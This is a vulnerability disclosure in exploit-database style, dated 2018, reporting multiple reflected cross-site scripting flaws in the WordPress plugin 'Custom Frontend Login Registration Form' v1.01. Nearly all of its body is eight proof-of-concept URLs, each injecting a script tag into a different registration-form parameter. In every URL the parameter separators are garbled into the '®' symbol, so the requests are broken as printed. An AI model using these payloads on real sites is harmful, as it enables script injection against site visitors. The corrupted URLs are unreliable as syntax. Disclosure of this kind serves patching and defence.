========================================================================================
Custom Frontend Login Registration Form v1.01 (WP Plugin) - Multiple XSS Vulnerabilities
========================================================================================
____________________________________________________________________________________
# Exploit Title: Custom Frontend Login Registration Form (WP Plugin) - Multiple XSS Vulnerabilities
# Date: [11-13-2018]
# Category: Webapps
____________________________________________________________________________________
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
____________________________________________________________________________________
# Software Link: https://wordpress.org/plugins/custom-frontend-login-registration-form
# Plugin: Custom Frontend Login Registration Form
# Version: v1.01 (last version)
# File: Registration Form
# Parameters: reg_bio, reg_email, reg_fname, reg_lname, reg_name,
nickname, reg_password, and reg_website.
# Language: This application is available in English language.
# Plugin Description: A WordPress plugin that an administrator can use to create
login forms and custom registration forms; then, after creating those forms,
an admin can use a shortcode to place a login/registration form on a page or post.
____________________________________________________________________________________
# Cross-Site Scripting Vulnerabilities:
Registration Form - Parameter: reg_bio
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=®_bio=qadoh";><script>alert(1)<%2fscript>b7sb3m2scdh®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_email
http://www.website.com/wordpress/index.php/registration-form/?reg_email=i1brx";><script>alert(1)<%2fscript>ee1c8o5kj1l®_website=®_password=®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_fname
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=r3mo6";><script>alert(1)<%2fscript>v4q2lzsnk7m®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_lname
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=ahrpv";><script>alert(1)<%2fscript>z50y4k9db7m
Registration Form - Parameter: reg_name
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=fi8ze";><script>alert(1)<%2fscript>j8rjcha5rvf®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: nickname
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=v0g30";><script>alert(1)<%2fscript>qm20vz35hbz®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_password
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=nn3du";><script>alert(1)<%2fscript>aopv3zr72k7®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_website
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=io8na";><script>alert(1)<%2fscript>iuotdm7w5i2®_password=®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
